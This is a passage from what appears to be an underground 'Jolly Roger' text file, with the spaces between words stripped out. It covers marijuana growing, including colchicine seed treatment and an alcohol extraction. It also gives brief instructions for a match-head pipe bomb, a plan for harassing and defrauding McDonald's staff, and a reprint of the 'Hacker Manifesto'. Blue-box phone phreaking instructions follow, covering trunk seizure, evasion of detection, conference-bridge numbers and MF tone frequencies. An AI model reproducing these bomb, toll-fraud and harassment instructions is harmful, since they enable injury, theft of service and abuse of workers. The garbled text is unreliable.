andthentransplant.Theothertheoryisthatyoushouldjuststarttheminthe correctlocation.Fewerplantswillcomeupwiththismethod,butthereisno shockoftransplanttokillsomeoftheseedlingshalfwaythrough.Thesoil shouldbepreparedforthelittledevilsbyturningitoveracoupleoftimes andaddingaboutonecupofhydratedlimepersquareyardofsoilandalittle bit(nottoomuch,now)ofgoodwatersolublenitrogenfertilizer.Thesoil shouldnowbewateredseveraltimesandlefttositaboutoneweek.Theplants shouldbeplantedatleastthreefeetapart,gettingtoogreedyandstacking themtooclosewillresultinstuntedplants.Theplantslikesomewaterduring theirgrowingseason,BUTnottoomuch.Thisisespeciallytruearoundthe roots,astoomuchwaterwillrottherootsystem.Grassgrowswellincornor hops,andtheseplantswillhelpprovidesomecamouflage.Itdoesnotgrowwell withrye,spinach,orpepperweed.Itisprobablyagoodideatoplantinmany small,brokenpatches,aspeopletendtonoticepatterns. GENERALGROWINGINFO BoththemaleandhefemaleplantproduceTHCresin,althoughthemaleisnotas strongasthefemale.Inagoodcrop,themalewillstillbeplentysmokableand shouldnotbethrownawayunderanycircumstances.Marijuanacanreachaheight oftwentyfeet(orwouldyouratherwishonastar)andobtainadiameterof4

inches.Ifnormal,ithasasexratioofabout1:1,butthiscanbealteredin severalways.Themaleplantdiesinthe12thweekofgrowing,thefemalewill liveanother35weekstoproduceheryounguns.Femalescanweightwiceasmuch asmaleswhentheyaremature.Marijuanasoilshouldcompactwhenyousqueeze it,butshouldalsobreakapartwithasmallpressureandabsorbwaterwell.A nicetestforeitherindoororoutdoorgrowingistoaddabunchofwormstothe soil,iftheyliveandhangaround,itisgoodsoil,butiftheydon't,well, changeit.Wormsalsohelpkeepthesoillooseenoughfortheplantstogrow well. SEEDS Togetgoodgrass,youshouldstartwiththerightseeds.Anicestartingpoint istosavetheseedsformthebestbatchyouhaveconsumed.Theseedsshouldbe virile,thatis,theyshouldnotbegrayandshriveledup,butgreen,meaty,and healthyappearing.Anicetestistodroptheseedsonahotfryingpan.Ifthey "CRACK,"theyareprobablygoodforplantingpurposes.Theseedsshouldbe soakedindistilledwaterovernightbeforeplanting.BESUREtoplantinthe groundwiththepointyendUP.Plantabout"deep.Healthyseedswillsproutin aboutfivedays. SPROUTING Thebestallaroundsproutingmethodisprobablytomakeasproutingbox(as soldinnurseries)withaslatedbottomorusepapercupswithholespunchedin thebottoms.Thesproutingsoilshouldbeamixtureofhumus,soil,andfive sandwithabitoforganicfertilizerandwatermixedinaboutoneweekbefore planting.Whenreadytotransplant,youmustbesureandleaveaballofsoil aroundtherootsofeachplant.Thiswholeballisdroppedintoabaseballsized holdinthepermanentsoil.Ifyouaregrowing/transplantingindoors,youshould useagreensafelight(purchasedatnurseries)duringthetransplanting operation.Ifyouaretransplantingoutdoors,youshouldtimeitabouttwohours beforesunsettoavoiddamagetotheplant.Alwayswearcottongloveswhen handlingtheyoungplants.Aftertheplantsaresetinthehole,youshould waterthem.Itisalsoagoodideatouseacommercialtransplantchemical(also purchasedatnurseries)tohelpthenovercometheshock. INDOORGROWING Indoorgrowinghasmanyadvantages,besidestheapparentfactthatitismuch hardertohaveyourcrop"found,"youcancontroltheambientconditionsjust exactlyasyouwantthemandgetaguaranteed"good"plant.Plantsgrownindoors willnotappearthesameastheiroutdoorcousins.Theywillbescrawnier appearingwithaweakstemsandmayevenrequireyoutotiethemtoagrowing posttoremainupright,BUTTHEYWILLHAVEASMUCHORMORERESIN!Ifgrowingin aroom,youshouldputtarpaperonthefloorsandthenbuysterilizedbagsof soilformanursery.Youwillneedaboutonecubicfootofsoilforeachplant. Theplantswillneedabout150mL.ofwaterperplant/perweek.Theywillalso needfreshair,sotheroommustbeventilated.(However,thefreshairshould containNOTOBACCOsmoke.)Atleasteighthoursoflightadaymustbeprovided. Asyouincreasethelight,theplantsgrowfasterandshowmorefemales/less males.Sixteenhoursoflightperdayseemstobethebestcombination,beyond thismakeslittleornoappreciabledifferenceintheplantquality.Another ideaistointerruptthenightcyclewithaboutonehouroflight.Thisgives youmorefemales.Thewallsofyourgrowingroomshouldbepaintedwhiteor coveredwithaluminumfoiltoreflectthelight.Thelightsthemselvescanbe eitherbulbsoffluorescent.Figureabout75wattsperplantoroneplantper twofeetoffluorescenttube.Thefluorescentsarethebest,butdonotuse "coolwhite"types.Thelightsourcesshouldbeanaverageoftwentyinchesfrom theplantandNEVERcloserthan14inches.Theymaybemountedonarackand movedeveryfewdaysastheplantsgrow.Theverybestlightsourcesarethose madebySylvaniaandothersespeciallyforgrowingplants(suchasthe"grolux" types). HARVESTINGANDDRYING

Themaleplantswillbetallerandhaveaboutfivegreenoryellowsepals,which willsplitopentofertilizethefemaleplantwithpollen.Thefemaleplantis shorterandhasasmallpistillateflower,whichreallydoesn'tlooklikea floweratallbutratherasmallbunchofleavesinacluster.Ifyoudon'twant anyseeds,justgooddope,youshouldpickthemalesbeforetheyshedtheir pollenasthefemalewillusesomeofherresintomaketheseeds.Afteranother threetofiveweeks,afterthemalesaregone,thefemaleswillbegintowither anddie(fromloneliness?),thisisthetimetopick.InsomenefariousMiddle Easterncountries,farmersreportedlyputtheirbeehivesnexttofieldsof marijuana.Thelittledevilscollectthegrasspollenfortheirhoney,whichis supposedtocontainafairdosageofTHC.Thehoneyisthenenjoyedby conventionalmethodsormadeintoambrosia.Ifyouwantseedsletthemales shedhispollenthenpickhim.Letthefemalegoanothermonthandpickher.To curetheplants,theymustbedried.Onlargecrops,thisisaccomplishedby constructingadryingboxordryingroom.Youmusthaveaheatsource(suchas anelectricheater)whichwillmakethebox/roomeach130.Thebox/roommustbe ventilatedtocarryoffthewatervaporladenairandreplaceitwithfresh.A goodboxcanbeconstructedfromanorangecratewithfiberglassinsulated walls,ventsinthetops,andscreenshelvestoholdtheleaves.Theremustbea bafflebetweentheleavesandtheheatsource.Aquickcureforsmalleramounts isto:cuttheplantatthesoillevelandwrapitinaclothsoasnottoloose anyleaves.Takeoutanyseedsbyhandandstore.Placealltheleavesona cookiesheetoraluminumfoilandputtheminthemiddleshelfoftheoven, whichisseton"broil."Inafewseconds,theleaveswillsmokeandcurlup, stirthemaroundandgiveanothertensecondsbeforeyoutakethemout. TOINCREASETHEGOODSTUFF Thereareseveraltrickstoincreasethenumberoffemales,ortheTHCcontent ofplants:Youcanmaketheplantsmaturein36daysifyouareinahurry,by cuttingbackonthelighttoabout14hours,buttheplantswillnotbeasbig. Youshouldgraduallyshortenthelightcycleuntilyoureachfourteenhours.You canstopanywateringastheplantsbegintobaketheresinrisetotheflowers. Thiswillincreasetheresinabit.Youcanuseasunlampontheplantsasthey begintodevelopflowerstalks.Youcansnipofftheflower,rightatthespot whereitjoinstheplant,andanewflowerwillforminacoupleofweeks.This canberepeatedtwoorthreetimestogetseveraltimesmoreflowersthanusual. IftheplantsaresprayedwithEthrelearlyintheirgrowingstage,theywill producealmostallfemaleplants.Thisusuallyspeedsupthefloweringalso,it mayhappeninaslittleastwoweeks.Youcanemployagrowthchangercalled colchicine.Thisisabithardtogetandexpensive.(Shouldbeorderedthrough alabofsomesortandcostsabout$35agram.)Tousethecolchicine,you shouldprepareyourpresoakingsolutionofdistilledwaterwithabout0.10per centcolchicine.Thiswillcausemanyoftheseedstodieandnotgerminate,but theonesthatdocomeupwillbepolyploidplants.Thisistheaccepted differencebetweensuchstrainsas"gold"andnormalgrass,andyourswill DEFINITELYbesuperweed.Theproblemhereisthatcolchicineisapoisonin largerquantitiesandmaybepoisonousinthefirstgenerationofplants.Bill Frake,authorofCONNOISSEUR'SHANDBOOKOFMARIJUANArunsaverycomplete colchicinetreatmentdownandwarnsagainstsmokingthefirstgenerationplants (allsucceedinggenerationswillalsobepolyploid)becauseofthispoisonous quality.However,theMedicalIndexshowscolchicinebeinggiveninverysmall quantitiestopeoplefortreatmentifvariousailments.Althoughthese quantitiesaresmall,theywouldappeartobelargerthananyyoucouldreceive formsmokingaseedtreatedplant.Itwouldbeagoodideatobuyacopyof CONNOISSEUR'S,ifyouareplanningtoattemptthis,andreadMr.Drake's completeinstructions.Anotherstillexperimentalprocesstoincreasetheresin ittopinchofftheleaftipsassoonastheyappearfromthetimetheplantis intheseedlingstageonthroughitsentirelifespan.Thisproducesa distorted,wreckedlookingplantwhichwouldbeverydifficulttorecognizeas marijuana.Ofcourse,thereislesssubstancetothisplant,butsuchwrecked creatureshavebeenknowntoproducesomuchresinthatitcrystallizesastrong hashalloverthesurfaceoftheplantmightbewisetotryitonaplantor

twoandseewhathappens. PLANTPROBLEMCHART Alwayschecktheoverallenvironmentalconditionspriortopassingjudgment soilaround7pHorslightlylessplentyofwater,light,freshair,loose soil,nowaterstandinginpools. SYMPTOM PROBABLYPROBLEM/CURE Largerleavesturningyellowsmallerleavesstillgreen. Nitrogendeficiency addnitrateofsodaororganicfertilizer. Olderleaveswillcurlatedges,turndark,possiblywithapurplecast. Phosphorousdeficiencyaddcommercialphosphate. Matureleavesdevelopayellowishcasttoleastvenialareas. Magnesium deficiencyaddcommercialfertilizerwithamagnesiumcontent. Matureleavesturnyellowandthenbecomespottedwithedgeareasturningdark gray. Potassiumdeficiencyaddmuriateofpotash. Crackedstems,nohealthysupporttissue. Borondeficiencyaddanyplantfood containingboron. Smallwrinkledleaveswithyellowishveinsystems. Zincdeficiencyadd commercialplantfoodcontainingzinc. Youngleavesbecomedeformed,possiblyyellowing. Molybdenumdeficiencyuse anyplantfoodwithabitofmolybdenuminit. EXTRASECTION:BADWEED/GOODWEED Canyouturnbadweedintogoodweed?Surprisinglyenough,theanswertothis oftenaskedinquiryis,yes!Likemostotherthingsinlife,theamountofgood youaregoingtodorelatesdirectlytohowmucheffortyouaregoingtoput intoit.Therearenoinstant,supermarketproductswhichyoucansprayon Kansascatnipandhavewonderweed,butthereareanumberofsimplified, inexpensiveprocesses(Gee,Mr.Wizard!)whichwillenhancemediocregrass somewhat,andthereareacoupleoffairlyinvolvedprocesseswhichwilldoup evenalmostparsleyweedintosomethingworthwritinghomeabout. EASES 1. Placethedopeinacontainerwhichallowsairtoenterinarestricted fashion(suchasacanwithnailholespunchedinitslid)andaddabunchof dryice,andtheplacethewholeshebanginthefreezerforafewdays.This processwilladdacertainamountofpotencytotheproduct,however,thisonly workswithdryice,ifyouusenormal,everydayfreezerice,youwillendup withasoggymess... 2. Takeaquantityofgrassanddampenit,placeinabaggyoranother sociallyacceptablecontainer,andstoreitinadark,dampishplacefora coupleofweeks(buryingitalsoseemstowork).Thegrasswilldevelopamold whichtastesabitharsh,aandburnsatinybitfunny,butdoesincreasethe potency. 3. Exposethegrasstothehighintensitylightofasunlampforafullday orso.Personally,Idon'tfeelthatthisisworththeeffort,butifyoujust spent$400ofyourfriend'smoneyforthisbrickofsuperColombian,rightfrom thePresident'spersonalstash,anditturnsouttobeMissouriweed,andyou're packingyourbagstoleavetownbeforethepeoplearrivefortheirshares,well, youmightatleasttryit.Can'thurt. 4. Taketheundesirableportionsofourstash(stems,seeds,weakweed, worms,etc.)andplacetheminacoveredpot,withenoughrubbingalcoholto covereverything.NowCAREFULLYboilthemixtureonanELECTRICstoveorlab burner.DONOTUSEGASthealcoholistooflammable.After45minutesofheat, removethepotandstrainthesolidsout,SAVINGTHEALCOHOL.Now,repeatthe processwiththesameresiduals,butfreshalcohol.Whenthesecondboilis over,removethesolidsagain,combinethetwoquantitiesofalcoholandreboil untilyouhaveasyrupymixture.Now,thissyrupymixturewillcontainmuchof

theTHCformerlyhiddeninthestemsandsuch.Onesimplytakesthissyrupthe thoroughlycombinesitwiththegrassthatonewishestoimproveupon. SPECIALSECTIONONRELATEDSUBJECTMARYGIN Maryginisananagramofthewordsmarijuanaandgin,asinEliWhitney.Itisa plastictumblerwhichactsmuchlikeacommercialcottongin.Onetakesabout oneounceofanherbandbreaksitup.ThisisthenplacedintheMaryginand theprotrudingknobisrotated.Thisactionturnstheinternalwheel,which separatesthegrassfromthedebris(seeds,stems).Itdoesnotpulverizethe grassasscreenshaveahabitofdoingandiseasilywashable. Maryginisavailablefrom: P.O.Box5827 Tuscon,Arizona85703 $5.00 GRASS EdmundScientificCompany 555EdscorpBuilding Barrington,NewJersy08007 FreeCatalogisawonderofgoodthingsforthepotentialgrassgrower.They haveanelectricthermostatgreenhouseforstartingplants.Lightswhich approximatethetruecolorbalanceofthesunandareprobablythemost beneficialtypesavailable:40watt,48inchIndoorsunbulb,75or150watt And,theyhaveanaturalgrowthregulatorforplants(Gibberellin)whichcan changeheight,speedgrowth,andmaturity,promoteblossoming,etc.Eachplant reactsdifferentlytotreatmentwithGibberellin...there'snofunlike experimenting. SUGGESTEDREADING THECONNOISSEUR'SHANDBOOKOFMARIJUANA,BillDrake StraightArrowPublishing$30 625ThirdStreet SanFrancisco,California FLASH P.O.Box16098 SanFransicso,California94116 Stocksaseriesofpamphletsongrass,dopemanufacture,cooking.Includesthe MaryJaneSuperweedseries. 73.MatchHeadBombbyTheJollyRoger Simplesafetymatchheadsinapipe,cappedatbothends,makeadevastating bomb.Itissetoffwitharegularfuse.Aplasticbaggyisputintothepipe beforetheheadsgointopreventdetonationbycontactwiththemetal.Cutting enoughmatchheadstofillthepipecanbetediousworkforonebutanevening's funforthefamilyifyoucandragthemawayfromtheTV. 74.HowToTerrorizeMcDonaldsbyTheJollyRoger Now,althoughMcDonaldsisfamousforit'sadvertisingandmakingthewhole worldthinkthattheBigMacisthebestthingtocomealongsinceslicedbread (buns?),eachlittlerestaurantisasamateurandsimpleasanewfound business.Notonlyarealltheemployeesratherinexperiencedatwhatthey're supposedtodo,buttheywilljustlooseallcontrolwhenanemergency occurs....herewego!!!First,getafewfriends(4isgood...I'llgettothis

later)andentertheMcDonaldsrestaurant,talkingloudlyandreekingofsome strangesmellthatautomaticallymakestheoldcouplesittingbythedoorleave. Ifoneofthosepimplyfacedgoonsiswipingthefloor,thentracksomecrapall overit(youcouldpretendtoslipandbreakyourhead,butyoumightactually doso).Next,beforeyougetthefood,findatable.Startyellingandreleasing somestrangebodyodorsoanybodywouldleavetheirtableandwalkoutthedoor. Sittwofriendsthere,andgouptothecounterwithanother.Findaplacewhere thelineisshort,orifthelineislongsay"Ionlywannabuyacoke."andyou getmovedup.Now,yougettodotheordering...hehhehheh.Somebodyalways mustwantaplainhamburgerwithabsolutelynothingonit(thistakesextratime tomake,anddrivesthelittlehamburgermakersinsane)..ordera9packof chickenMcNuggets...no,a20pack...no,three6packs...wait...gobacktothe tableandaskwhowantswhat.Yourotherfriendwaitsbythecounterandmakesa passatthefemaleclerk.Getbacktothethingandorderthree6packsof chickenetc....nowshesays"Whatkindofsaucewouldyoulike?".Ofcourse,say thatyouallwantbarbecuesauceoneofyourfriendswants2(onlyifthereare only2containersofbarbecuesauceleft).Thentheyhaftagointothestoreroom andopenupanotherbox.Finally,thedrinks...somebodywantscoke,somebody rootbeer,andsomebodydietcoke.Afterthesearedelivered,bringthemback andsay"Ididn'torderadietcoke!Iorderedasprite!"Thisgetsthemmad; betteryet,turndownsomethingterriblethatnobodywantstodrink,sothey haftathrowthedrinkaway;theycan'tsellit.Afterallthefood(?)ishanded toyou,youmustneverhaveenoughmoneytopay.Theclerkwillbesoangryand confusedthatshe'llletyougetawaywithit(anotherinfluenceonherisyour friendaskingher"Ifyouletusgo,I'llgooutwithyou."andgivinghera fakefonenumber).Now,backtoyourtable.Butfirst,somebodylikesketchup andmustard.Andplenty(toomuch)ofnapkins.Oh,andsomebodylikesforksand knives,soalwaysendupbreakingtheonesyoupickouttathebox.Haveyour friendsyellout,Yay!!!!!Wehavemunchies!!"Asloudastheycan.That'll worrytheentirerestaurant.Proceedtositdown.So,youaresittinginthe smokingsection(byaccident)eh?Well,whileoneofthetobaccobreathersisn't looking,putasignfromtheothersideoftheroomsaying"Donotsmokehere" andhe'llhaftamove...thenhegoesintotherealnonsmokingsection,andgets yelledat.Hethenthinksthatnosmokingisallowedintherestaurant,sohe eatsoutside(inthepouringrain)afteryourmealisfinished(andquiteafew splatteredopenedketchuppacketsarealloveryourtable),trytoleave.But oops!Somebodyhastodohisdutyinthemen'sroom.Ashegoesthere,hesticks anuneatenhamburger(wouldyoudaretoeatoneoftheirhamburgers?)Insidethe toilet,flushesitawhile,untilitrunsalloverthebathroom.Oops!Senda pimplyfacedteenagertocleanitup.(Hewon'tknowthatbrownthingisa hamburger,andhe'llgetsick.Wheee!)Asyouleavetherestaurant,lookingback atyouruncleanedtable,somebodymustrememberthattheylefttheirchocolate shakethere!Theonethat'salmostfull!!!!Hetakesitthensays"Thistastes likecrap!",Thenhetakesoffthelidandthrowsitintothegarbage can...oops!Hemissed,andnowthesamepoorsoulwho'scleaningupthebathroom nowhastacleanupchocolateshake.Thenleavethejoint,reversingthe"Yes, we'reopen"sign(asareminderofyourvisit)Thereyouhaveit!Youhavejust putallofMcDonaldsintocompletemayhem.Andsincethereisnopenaltyfor litteringinarestaurant,buggingpeopleinapubliceatery(orthrowupery,in thiscase)yougetoffscotfree.Wasn'tthatfun? 75."Mentor'sLastWords"by+++TheMentor+++ Thefollowingfileisbeingreprintedinhonorandsympathyforthemanyphreaks andhackersthathavebeenbustedrecentlybytheSecretService. TheConscienceofaHacker Anotheronegotcaughttoday,it'salloverthepapers."TeenagerArrestedin ComputerCrimeScandal","HackerArrestedafterBankTampering"...Damnkids. They'reallalike.Butdidyou,inyourthreepiecepsychologyand1950's

technobrain,evertakealookbehindtheeyesofthehacker?Didyouever wonderwhatmadehimtick,whatforcesshapedhim,whatmayhavemoldedhim?I amahacker,entermyworld...Mineisaworldthatbeginswithschool...I'm smarterthanmostoftheotherkids,thiscraptheyteachusboresme...Damn underachiever.They'reallalike.I'minjuniorhighorhighschool.I've listenedtoteachersexplainforthefifteenthtimehowtoreduceafraction.I understandit."No,Ms.Smith,Ididn'tshowmywork.Ididitinmyhead..." Damnkid.Probablycopiedit.They'reallalike.Imadeadiscoverytoday.I foundacomputer.Waitasecond,thisiscool.ItdoeswhatIwantitto.If itmakesamistake,it'sbecauseIscreweditup.Notbecauseitdoesn'tlike meorfeelsthreatenedbymeorthinksI'masmartassordoesn'tliketeaching andshouldn'tbehere...damnkid.Allhedoesisplaygames.They'reallalike. Andthenithappened.Adooropenedtoaworld.Rushingthroughthephoneline likeherointhroughanaddict'sveins,anelectronicpulseissentout,arefuge fromthedaytodayincompetenciesissought...aboardisfound."Thisisit... thisiswhereIbelong..."Iknoweveryonehere...evenifI'venevermetthem, nevertalkedtothem,mayneverhearfromthemagain...Iknowyouall...Damn kid.Tyingupthephonelineagain.They'reallalike...Youbetyourasswe're allalike...we'vebeenspoonfedbabyfoodatschoolwhenwehungeredfor steak...thebitsofmeatthatyoudidletslipthroughwereprechewedand tasteless.We'vebeendominatedbysadists,orignoredbytheapathetic.The fewthathadsomethingtoteachfounduswillingpupils,butthosefewarelike dropsofwaterinthedesert. Thisisourworldnow...theworldoftheelectronandtheswitch,the beautyofthebaud.Wemakeuseofaservicealreadyexistingwithoutpaying forwhatcouldbedirtcheapifitwasn'trunbyprofiteeringgluttons,andyou calluscriminals.Weexplore...andyoucalluscriminals.Weseekafter knowledge...andyoucalluscriminals.Weexistwithoutskincolor,without nationality,withoutreligiousbias...andyoucalluscriminals.Youbuild atomicbombs,youwagewars,youmurder,cheat,andlietousandtrytomakeus believeit'sforourowngood,yetwe'rethecriminals. Yes,Iamacriminal.Mycrimeisthatofcuriosity.Mycrimeisthatof judgingpeoplebywhattheysayandthink,notwhattheylooklike.Mycrimeis thatofoutsmartingyou,somethingthatyouwillneverforgivemefor.Iama hacker,andthisismymanifesto.Youmaystopthisindividual,butyoucan't stopusall...afterall,we'reallalike. +++TheMentor+++ MaythemembersofthephreakcommunityneverforgethiswordsJR 76.TheMythofthe2600hzDetectorbyTheJollyRoger JustabouteveryoneItalktothesedaysaboutESSseemstobescaredwitless aboutthe2600hzdetector.Idon'tknowwhothoughtthisoneup,butitsimply doesnotexist.Somanyofyoupeoplewhineaboutthissocalledphreakcatching devicefornoreason.SomeonewithAT&Tsaidtheyhadittocatchphreakers. Thiswasjusttoscaretheblueboxersenoughtomakethemquitboxingfree calls.I'mnotsayingESSiswithoutitshangups,either.OnethingthatESS candetectreadilyisthekickbackthatthetrunkcircuitrysendsbacktothe ESSmachinewhenyourlittle2600hztoneresetsthetolltrunk.AfteranESS detectsakickbackitturnsanMFdetectoronandrecordsanyMFtones transmitted. Defeatingthekickbackdetector Asmentionedinmypreviousnote,kickbackdetectioncanbeaseriousnuisance toanyoneinterestedingainingcontrolofatrunkline.Theeasiestwaytoby passthisdetectioncircuitryisnotreallybypassingitatall,itisjust lettingthekickbackgetdetectedonsomeotherline.Thisotherlineisyour localMCI,sprint,orotherlongdistancecarrier(exceptAT&T).Theonlycatch isthattheserviceyouusemustnotdisconnectthelinewhenyouhitthe2600hz tone.Thisishowyoudoit:callupyourlocalextender,putinthecode,and

dialanumberinthe601areacodeandthe644exchange.Lotsofotherexchanges workacrossthecountry,I'msure,butthisistheonlyonethatIhavefoundso far.Anyway,whenitstartsringing,simplyhit2600Hzandyou'llhearthe kickback,(kachirp,orwhatever).Thenyouarereadytodialwhoeveryouwant (conferences,inward,routeandrate,overseas,etc.)Fromthetrunklinein operatortones!Sinceblowing2600Hzdoesn'tmakeyouaphreakeruntilthetoll equipmentresetstheline,kickbackdetectionisthemethodAT&Tchooses(for now)thisinformationcomesasaresultofmyexperiments&experienceandhas beenverifiedbylocalAT&TemployeesIhaveasacquaintances.Theycouldonly saythatthisistrueformyarea,butwereprettysurethatthesameideais implementedacrossthecountry. Nowthatyouknowhowtoaccessatrunklineorasoperatorssayaloop,Iwill tellyouthemanythingsyoucandowithit.HereisalistofAT&Tservices accessibletoyoubyusingabluebox. A/C+101TOLLSWITCHING A/C+121INWARDOPERATOR A/C+131INFORMATION A/C+141ROUTE&RATEOP. A/C+11501MOBILEOPERATOR A/C+11521MOBILEOPERATOR Startingconferences: Thisisonethemostusefulattributesofblueboxing.Nowtheconfs.areup24 hours/dayand7days/weekandthebillinglinesarebeingbilled.SinceI believetheaboveistrue(aboutthebillinglinesbeingbilled)Iwould recommendthatyouneverletyournumbershowupontheconf.Ifyoustartedit, putitonaloopandthencalltheloop.Enoughbullshit!!!!!Tostarttheconf. Dialoneofthesethreenumbersinmfwhileyouareonthetrunk. 213+080+XXXX XXXX=1050,3050 SPECIALXXXX=1000,1100,1200,1500,2200,2500. ThesenumbersareinLAandarethemostwatched,Idonotadviseusingthis NPA. 312+001+1050OR3050 914+042+1050OR1100,1200ECT.. Ibelieveonly914worksatthemoment. Onceconnectedwithoneoftheseyouwilleitherhearareorder,busy,or chirp.WhenyouhearthechirpenterthebillinglineinMF.Iusetheconf. dialup.Abillinglineexample:kp312+001+1050styouwillthenheartwotutes andarecordingaskingyouforthenumberofconfereesincludingyourself. Enteranumberbetween20and30.Ifyouevergetover30peopleonaconference allyouwillhearisjumbledvoices.Aftertheitsays"yourconferencesizeis xx"thenhitthepound(#)sign.Addyourfavoritelooponandhit6to transfercontroltoit.Afteritsayscontrolwillbetransferredhangupand calltheothersideoftheloop,hitthepoundsign(#)andfollowthe instructions.Abonusforconf.istoaddaninternationalnumberdial 1+011+cc+numberprettycoolehhh.Afewextranotes.Donotaddnumbersthatyou willwanttohangup,addthesethroughMCIorSprint.Youcannotblowanyone offwith2600hzunlesstheyareinanoldxbaroroldersystem.ManyDA operatorswillstayonafteryouabusethem;youmayhavetostartanotherorat leastdon'tsayanynumbers.Neveraddthetonesideofaloopontoaconf. neveraddmorethanoneMCInodeonyourconf. Route&rate: Noteroute&rateandRQSperformthesameservice.R&Rsimplytellsyouroute andrateinfowhichisveryvaluable,ex.Suchastheinwardroutingforan

exchangeinanareacode.Aninwardroutingwillletyoucallherandshecando anemergencyinterruptforyou.Shecantellyouhowtogetinternational operators,ect.Herearethetermsyouarerequiredtouse: International, Operatorroutefor[country,city]. givesyouinwardop. Directoryroutefor[country,city]. givesyoudirectoryass. Cityroutefor[country,city]. givesyoucountryandcitycode. Operatorroutefor[a/c]+[exchange] givesyouinwardop.Route Ex.[a/c]+or[a/c]+0xx+whenshesaysplusshemeansplus121. Numbersroutefor[state,city] givesyoua/c. Placename[a/c]+[exchange] givesyoucity/stateforthata/cand Exchange. Internationalcalls: Tocallinternationalovercablesimplyaccessatrunkanddialkp011xxxstwait forsendertone,kpxxxccnumberstxxxa3digitcountrycode,itmaynotbe3 digitssojustput1or20'sinfrontofit.Ccisthecitycodetogoby satellite: Dialkp18xstxnumbers28waitforsendertonethenKpxxxccnumberst 77.BlueBoxbyTheJollyRoger ToquoteKarlMarx,blueboxinghasalwaysbeenthemostnobleformof phreaking.AsopposedtosuchthingsasusinganMCIcodetomakeafreefone call,whichismerelymindlesspseudophreaking,blueboxingisactual interactionwiththeBellSystemtollnetwork.Itislikewiseadvisabletobe morecautiouswhenblueboxing,butthecarefulphreakwillnotbecaught, regardlessofwhattypeofswitchingsystemheisunder.Inthispart,Iwill explainhowandwhyblueboxingworks,aswellaswhere.Inlaterparts,Iwill givemorepracticalinformationforblueboxingandroutinginformation.To beginwith,blueboxingissimplycommunicatingwithtrunks.Trunksmustnotbe confusedwithsubscriberlines(or"customerloops")whicharestandardtelefone lines.Trunksarethoselinesthatconnectcentraloffices.Now,whentrunksare notinuse(i.e.,idleor"onhook"state)theyhave2600Hzappliedtothem.If theyaretwowaytrunks,thereis2600Hzinbothdirections.WhenatrunkISin use(busyor"offhook"state),the2600Hzisremovedfromthesidethatisoff hook.The2600Hzisthereforeknownasasupervisorysignal,becauseit indicatesthestatusofatrunk;onhook(tone)oroffhook(notone).Notealso that2600HzdenotedSF(singlefrequency)signalingandis"inband."Thisis veryimportant."Inband"meansthatiswithinthebandoffrequenciesthatmay betransmittedovernormaltelefonelines.OtherSFsignals,suchas3700Hzare usedalso.However,theycannotbecarriedoverthetelefonenetworknormally (theyare"outofband"andarethereforenotabletobetakenadvantageofas 2600Hzis.Backtotrunks.Let'stakeahypotheticalphonecall.Youpickup yourfoneanddial1+8062581234(yourgoodfriendinAmarillo,Texas).For ease,we'llassumethatyouareon#5Crossbarswitchingandnotinthe806 area.Yourcentraloffice(CO)wouldrecognizethat806isaforeignNPA,soit wouldroutethecalltothetollcenterthatservesyou.[Forthesakeof accuracyhere,andforthemoreexperiencedreaders,notethattheCOin questionisaclass5withLAMAthatusesoutofbandSFsupervisorysignaling]. Dependingonwhereyouareinthecountry,thecallwouldleaveyourtollcenter (onmoretrunks)toanothertollcenter,orofficeofhigher"rank".Thenit wouldberoutedtocentraloffice806258eventuallyandthecallwouldbe completed. Illustration ACO1TC1TC2CO2B A....you CO1..yourcentraloffice

TC1..yourtolloffice. TC2..tollofficeinAmarillo. CO2..806258centraloffice. B....yourfriend(8062581234) InthissituationitwouldberealistictosaythatCO2usesSFinband(2600Hz) signaling,whilealltheothersuseoutofbandsignaling(3700Hz).Ifyoudon't understandthis,don'tworry.Iampointingthisoutmerelyforthesakeof accuracy.Thepointisthatwhileyouareconnectedto8062581234,allthose trunksfromYOURcentraloffice(CO1)tothe806258centraloffice(CO2)do *NOT*have2600Hzonthem,indicatingtotheBellequipmentthatacallisin progressandthetrunksareinuse.Nowlet'ssayyou'retiredoftalkingto yourfriendinAmarillo,soyousenda2600Hzdowntheline.Thistonetravels downthelinetoyourfriend'scentraloffice(CO2)whereitisdetected. However,thatCOthinksthatthe2600HzisoriginatingfromBellequipment, indicatingtoitthatyou'vehungup,andthusthetrunksareonceagainidle (with2600Hzpresentonthem).Butactually,youhavenothungup,youhave fooledtheequipmentatyourfriend'sCOintothinkingyouhave.Thus,it disconnectshimandresetstheequipmenttoprepareforthenextcall.Allthis happensveryquickly(300800msforstepbystepequipmentand150400msfor otherequipment).Whenyoustopsending2600Hz(afteraboutasecond),the equipmentthinksthatanothercalliscomingtowards>onhook,notone>off hook.Nowthatyou'vestoppedsending2600Hz,severalthingshappen: 1. Atrunkisseized. 2. A"wink"issenttotheCALLINGendfromtheCALLEDendindicatingthat theCALLEDend(trunk)isnotreadytoreceivedigitsyet. 3. AregisterisfoundandattachedtotheCALLEDendofthetrunkwithin abouttwoseconds(max). 4. AstartdialsignalissenttotheCALLINGendfromtheCALLEDend indicatingthattheCALLEDendisreadytoreceivedigits.Now,allofthisis prettymuchtransparenttotheblueboxer.Allhereallyhearswhenthesefour thingshappenisa.So,seizureofatrunkwouldgosomethinglikethis: 1. 2. 3. Senda2600Hz Terminate2600Hzafter12secs. [beep][kerchunk]

Oncethishappens,youareconnectedtoatandemthatisreadytoobeyyour everycommand.Thenextstepistosendsignalinginformationinordertoplace yourcall.Forthisyoumustsimulatethesignalingusedbyoperatorsand automatictolldialingequipmentforuseontrunks.Therearemainlytwo systems,DPandMF.However,DPwentoutwiththedinosaurs,soI'llonly discussMFsignaling.MF(multifrequency)signalingisthesignalingusedby themajorityoftheinterandintralatanetwork.Itisalsousedin internationaldialingknownastheCCITTNosystem.MFsignalsconsistof7 frequencies,beginningwith700Hzandseparatedby200Hz.Adifferentsetoftwo ofthe7frequenciesrepresentthedigits0thru9,plusanadditional5special keys.Thefrequenciesandusesareasfollows: Frequencies(Hz) 700+900 1 700+1100 2 900+1100 3 700+1300 4 900+1300 5 1100+1300 6 700+1500 7 900+1500 8 1100+1500 9 1300+1500 0 700+1700 ST3p Domestic 1 2 3 4 5 6 7 8 9 0 Code1 International

900+1700 1100+1700 1300+1700 1500+1700

Stp KP ST2p ST

Code1 KP1 KP2 ST

